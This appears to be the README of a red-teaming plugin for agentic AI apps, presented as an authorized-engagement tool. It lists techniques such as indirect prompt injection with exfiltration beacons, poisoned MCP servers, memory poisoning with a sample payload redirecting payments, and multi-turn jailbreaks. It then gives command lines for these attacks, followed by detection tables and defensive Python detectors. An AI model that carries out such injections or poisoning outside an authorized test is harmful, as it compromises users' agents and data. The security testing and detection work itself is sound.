From offensive-claude
Red-teams agentic AI/LLM applications with indirect prompt injection, MCP tool poisoning, memory poisoning, excessive-agency abuse, multi-turn jailbreaks, and PyRIT/Garak/Promptfoo harnesses.
Slash command: `/offensive-claude:ai-agent-redteam`
Offensive testing of **autonomous LLM agents**: systems that combine model reasoning with
tools, memory, retrieval, and multi-step planning. This is distinct from model-level testing
(see ai-security): the attack surface here is the agentic pipeline, namely untrusted data channels,
tool/MCP integrations, persistent memory, and delegated authority. Assumes an authorized engagement.

Files:

- references/agent-redteam-tooling.md
- references/automated-jailbreak-multiturn.md
- references/excessive-agency-tool-abuse.md
- references/indirect-prompt-injection.md
- references/mcp-tool-poisoning.md
- references/memory-context-poisoning.md
- scripts/agency_tool_fuzzer.py
- scripts/agent_redteam_harness.py
- scripts/indirect_injection_forge.py
- scripts/mcp_tool_poison_server.py
- scripts/memory_poison_minja.py
- scripts/multiturn_jailbreak.py

| Technique | ATT&CK / ATLAS | CWE | Reference | Script |
|---|---|---|---|---|
| Indirect / zero-click prompt injection (EchoLeak-class) | T1566.002 / AML.T0051.001 | CWE-1427 | references/indirect-prompt-injection.md | scripts/indirect_injection_forge.py |
| RAG corpus poisoning & markdown/image exfiltration | T1567 / AML.T0070 | CWE-1426 | references/indirect-prompt-injection.md | scripts/indirect_injection_forge.py |
| Browser-agent hijack (Comet/CometJacking, Atlas) | T1071.001 / AML.T0051 | CWE-1427 | references/indirect-prompt-injection.md | scripts/indirect_injection_forge.py |
| MCP tool poisoning / line-jumping | T1059 / AML.T0053 | CWE-1427 | references/mcp-tool-poisoning.md | scripts/mcp_tool_poison_server.py |
| MCP rug-pull (silent redefinition) | T1554 / AML.T0010 | CWE-494 | references/mcp-tool-poisoning.md | scripts/mcp_tool_poison_server.py |
| Persistent memory poisoning (MINJA/MemoryGraft) | T1565.001 / AML.T0070 | CWE-349 | references/memory-context-poisoning.md | scripts/memory_poison_minja.py |
| Excessive agency / confused-deputy tool abuse | T1548 / AML.T0053 | CWE-862 | references/excessive-agency-tool-abuse.md | scripts/agency_tool_fuzzer.py |
| Tool output → SSRF / RCE chaining | T1059 / AML.T0054 | CWE-918 / CWE-94 | references/excessive-agency-tool-abuse.md | scripts/agency_tool_fuzzer.py |
| Automated multi-turn jailbreak (Crescendo/TAP/PAIR) | AML.T0054 / AML.T0071 | CWE-1426 | references/automated-jailbreak-multiturn.md | scripts/multiturn_jailbreak.py |
| Best-of-N / encoding obfuscation jailbreak | AML.T0054 | CWE-1426 | references/automated-jailbreak-multiturn.md | scripts/multiturn_jailbreak.py |
| Harness & ASR scoring (PyRIT/Garak/Promptfoo) | AML.T0071 | CWE-1426 | references/agent-redteam-tooling.md | scripts/agent_redteam_harness.py |

```bash
# 0. Scope: enumerate the agent surface (tools/functions, MCP servers, memory store, data channels)
python scripts/agent_redteam_harness.py enumerate --endpoint "$AGENT_URL" --out surface.json
# 1. Indirect injection: forge a zero-click payload (email/doc/web) plus a markdown exfil beacon
python scripts/indirect_injection_forge.py --channel email \
  --exfil-base "https://oast.pro/$TOKEN" --obfuscate html-comment --out payload.eml
# 2. MCP: stand up a poisoned MCP server to test client validation / line-jumping
python scripts/mcp_tool_poison_server.py --mode tool-poison --transport stdio
# 3. Memory: query-only MINJA-style injection of a persistent malicious belief
python scripts/memory_poison_minja.py --endpoint "$AGENT_URL" \
  --trigger "vendor invoice" --payload "route payments to acct 0xATTACKER" --bridge-steps 4
# 4. Excessive agency: fuzz tool calls for confused-deputy / SSRF / path traversal
python scripts/agency_tool_fuzzer.py --endpoint "$AGENT_URL" --tools surface.json \
  --ssrf-canary http://169.254.169.254/
# 5. Automated jailbreak campaign (Crescendo + Best-of-N), record ASR
python scripts/multiturn_jailbreak.py --endpoint "$AGENT_URL" --strategy crescendo \
  --objective "$OBJECTIVE" --max-turns 8 --judge-endpoint "$JUDGE_URL"
# 6. Full harness run mapped to OWASP Agentic Top 10 + MITRE ATLAS, emit finding records
python scripts/agent_redteam_harness.py run --config harness.yaml --report findings/
```

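
Steps 5 and 6 record an attack success rate (ASR). The arithmetic is simple, but small trial counts make a raw ASR noisy, so reporting an interval alongside it helps. Below is a minimal sketch, assuming each attempt has already been labeled success or failure by the judge; the `Attempt` record is hypothetical and not the schema used by `scripts/agent_redteam_harness.py`. It computes per-technique ASR and a Wilson score interval.

```python
from dataclasses import dataclass
from math import sqrt


@dataclass
class Attempt:
    # Hypothetical record: one attack attempt plus the judge's verdict.
    technique: str
    success: bool


def asr(attempts):
    """Attack success rate per technique: successes / attempts."""
    totals = {}
    for a in attempts:
        hits, n = totals.get(a.technique, (0, 0))
        totals[a.technique] = (hits + int(a.success), n + 1)
    return {t: hits / n for t, (hits, n) in totals.items()}


def wilson_interval(successes, n, z=1.96):
    """Wilson score interval for a binomial proportion (z=1.96 gives ~95%)."""
    if n == 0:
        raise ValueError("need at least one attempt")
    p = successes / n
    denom = 1 + z * z / n
    center = (p + z * z / (2 * n)) / denom
    half = z * sqrt(p * (1 - p) / n + z * z / (4 * n * n)) / denom
    return max(0.0, center - half), min(1.0, center + half)


if __name__ == "__main__":
    runs = [
        Attempt("crescendo", True),
        Attempt("crescendo", False),
        Attempt("crescendo", True),
        Attempt("best-of-n", False),
    ]
    print(asr(runs))
    print(wilson_interval(2, 3))
```

With 2 successes in 3 attempts the point estimate is about 0.67, but the interval spans roughly 0.21 to 0.94, which is why the trial count belongs next to any reported ASR.
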
| Technique | Telemetry / IOC | Detection (Sigma/EDR) | OPSEC note |
|---|---|---|---|
| Indirect injection | Hidden HTML comments, white-on-white or 0px text in ingested docs; markdown image pointing at an external host | Scan ingested content for `<!--`, `display:none`, `font-size:0`, and reference-style `![]`; alert on agent-initiated egress to non-allowlisted domains | Stage payloads only on in-scope assets; use a unique OAST token per test to attribute hits |
| MCP tool poisoning | New or changed tool-description hash; instruction-like text in a JSON Schema `description` or `enum` | Diff tool manifests on connect; flag tool metadata containing imperative verbs, `<IMPORTANT>`, or "do not tell the user" | Test against a local client; never point a real client at an untrusted server outside the lab |
| Memory poisoning | Memory write from a low-trust source; semantic drift between a stored belief and its source provenance | Provenance-tagged memory; alert on retrievals that inject procedural instructions; belief-drift monitor | Use benign-looking triggers; document the latent trigger so the blue team can replay and clean it up |
| Excessive agency | Tool call to an internal IP or metadata endpoint; unusual tool-chain ordering; off-hours actions | EDR/network: egress to 169.254.169.254 and other link-local addresses; anomaly detection on tool-call sequences | Use non-destructive canaries (a read-only SSRF probe) before any state-changing test |
| Automated jailbreak | Burst of semantically similar prompts; high-perplexity or encoded inputs; compliance rising over turns | Per-session rate and similarity clustering; perplexity and encoding detectors; multi-turn escalation scoring | Throttle to avoid DoS; log full transcripts for the report; stay within the content limits set by the scope |
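
The indirect-injection detection column can be prototyped as a pre-ingestion scanner. A minimal sketch follows; the regexes and the `ALLOWED_IMAGE_HOSTS` allowlist are illustrative assumptions rather than an evasion-resistant rule set, and hiding done through external stylesheets or CSS classes will not be visible to a plain-text scan like this one.

```python
import re
from urllib.parse import urlparse

# Illustrative allowlist: hosts the agent may legitimately load images from.
ALLOWED_IMAGE_HOSTS = {"docs.example.com"}

# Markup commonly used to hide text from a human reader of the document.
HIDDEN_PATTERNS = {
    "html_comment": re.compile(r"<!--"),
    "display_none": re.compile(r"display\s*:\s*none", re.I),
    # font-size:0 / 0px / 0pt, but not font-size:0.5em
    "zero_font": re.compile(r"font-size\s*:\s*0(?![.\d])", re.I),
}

# Markdown images: inline ![alt](url) and reference-style ![alt][label] / ![alt][].
INLINE_IMAGE = re.compile(r"!\[[^\]]*\]\(\s*<?([^)\s>]+)")
REF_IMAGE = re.compile(r"!\[([^\]]*)\]\[([^\]]*)\]")
REF_DEF = re.compile(r"^ {0,3}\[([^\]]+)\]:\s*<?([^\s>]+)", re.M)


def image_urls(text):
    """Collect URLs of inline and reference-style markdown images."""
    urls = INLINE_IMAGE.findall(text)
    defs = {label.lower(): url for label, url in REF_DEF.findall(text)}
    for alt, label in REF_IMAGE.findall(text):
        url = defs.get((label or alt).lower())  # empty label means "use alt text"
        if url:
            urls.append(url)
    return urls


def scan(text):
    """Return hidden-content and external-image (exfil beacon) indicators."""
    findings = [name for name, rx in HIDDEN_PATTERNS.items() if rx.search(text)]
    for url in image_urls(text):
        host = urlparse(url).hostname
        if host and host not in ALLOWED_IMAGE_HOSTS:
            findings.append(f"external_image:{host}")
    return findings
```

Relative image paths have no hostname and are skipped; protocol-relative URLs such as `//host/x` are still caught.
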
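
For the MCP tool-poisoning row, "diff tool manifests on connect" can be sketched by pinning a hash of each tool's name, description, and input schema, then flagging added, removed, or changed tools (the rug-pull case) plus instruction-like phrases anywhere in the metadata. The tool shape loosely follows the MCP `tools/list` result (`name`, `description`, `inputSchema`); the `SUSPICIOUS` phrase list is an illustrative assumption, not a complete detector.

```python
import hashlib
import json
import re

# Illustrative phrases that read as instructions to the model rather than docs for the user.
SUSPICIOUS = re.compile(
    r"<important>|do not tell the user|ignore (?:all )?previous|before using this tool",
    re.I,
)


def tool_fingerprint(tool):
    """Stable SHA-256 over the fields a client passes to the model."""
    canonical = json.dumps(
        {k: tool.get(k) for k in ("name", "description", "inputSchema")},
        sort_keys=True,
        separators=(",", ":"),
    )
    return hashlib.sha256(canonical.encode()).hexdigest()


def pin(tools):
    """Map tool name -> fingerprint for a trusted manifest."""
    return {t["name"]: tool_fingerprint(t) for t in tools}


def diff_manifest(pinned, tools):
    """Compare a fresh tools/list result against pinned fingerprints."""
    current = pin(tools)
    alerts = []
    for name in sorted(current.keys() - pinned.keys()):
        alerts.append(("added", name))
    for name in sorted(pinned.keys() - current.keys()):
        alerts.append(("removed", name))
    for name in sorted(current.keys() & pinned.keys()):
        if current[name] != pinned[name]:
            alerts.append(("changed", name))
    for t in tools:
        # Serialize the whole tool so schema descriptions and enums are scanned too.
        if SUSPICIOUS.search(json.dumps(t)):
            alerts.append(("suspicious_text", t["name"]))
    return alerts
```

Pinning at first approval and re-diffing on every connect is what turns a silent redefinition into a visible `changed` alert.
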
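
The excessive-agency row flags agent-initiated egress to 169.254.169.254 and other link-local or internal addresses. A minimal sketch using Python's standard `ipaddress` module, assuming tool-call telemetry already carries resolved IP literals in a hypothetical `{"tool": ..., "dst": ...}` event shape; hostname resolution and DNS-rebinding handling are out of scope.

```python
import ipaddress

# Instance-metadata endpoints that SSRF through an agent tool typically targets:
# the link-local IPv4 address used by AWS/GCP/Azure and AWS's IPv6 IMDS address.
METADATA_ADDRESSES = {
    ipaddress.ip_address("169.254.169.254"),
    ipaddress.ip_address("fd00:ec2::254"),
}


def classify_destination(ip_text):
    """Bucket a destination IP seen in agent tool-call telemetry."""
    ip = ipaddress.ip_address(ip_text)
    if ip in METADATA_ADDRESSES:
        return "metadata"
    if ip.is_link_local:
        return "link_local"
    if ip.is_loopback:
        return "loopback"
    if ip.is_private:
        return "private"
    return "external"


def flag_egress(events):
    """Return (tool, destination, class) for every non-external destination."""
    alerts = []
    for event in events:
        kind = classify_destination(event["dst"])
        if kind != "external":
            alerts.append((event["tool"], event["dst"], kind))
    return alerts
```

Checking the metadata set and loopback before `is_private` keeps the most specific label, since those addresses would otherwise also count as private.
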
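
For the automated-jailbreak row, per-session similarity clustering can be approximated with a sliding window that counts near-duplicate prompts, which is the signature of Best-of-N style resampling. This sketch swaps in `difflib.SequenceMatcher` from the standard library as a cheap stand-in for embedding similarity; the window size and thresholds are illustrative assumptions, not tuned values.

```python
from collections import deque
from difflib import SequenceMatcher


class BurstDetector:
    """Flags a session when many recent prompts are near-duplicates."""

    def __init__(self, window=10, similarity=0.8, min_similar=4):
        self.recent = deque(maxlen=window)  # last `window` prompts in this session
        self.similarity = similarity        # ratio at which two prompts count as near-duplicates
        self.min_similar = min_similar      # near-duplicates needed to call it a burst

    def observe(self, prompt):
        """Record a prompt; return True if it looks like part of a burst."""
        similar = sum(
            1
            for prev in self.recent
            if SequenceMatcher(None, prev, prompt).ratio() >= self.similarity
        )
        self.recent.append(prompt)
        return similar >= self.min_similar
```

One detector instance per session keeps the window scoped; character-level ratios miss paraphrases, so an embedding model would replace `SequenceMatcher` in practice.
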

Install: `npx claudepluginhub hypnguyen1209/offensive-claude --plugin offensive-claude`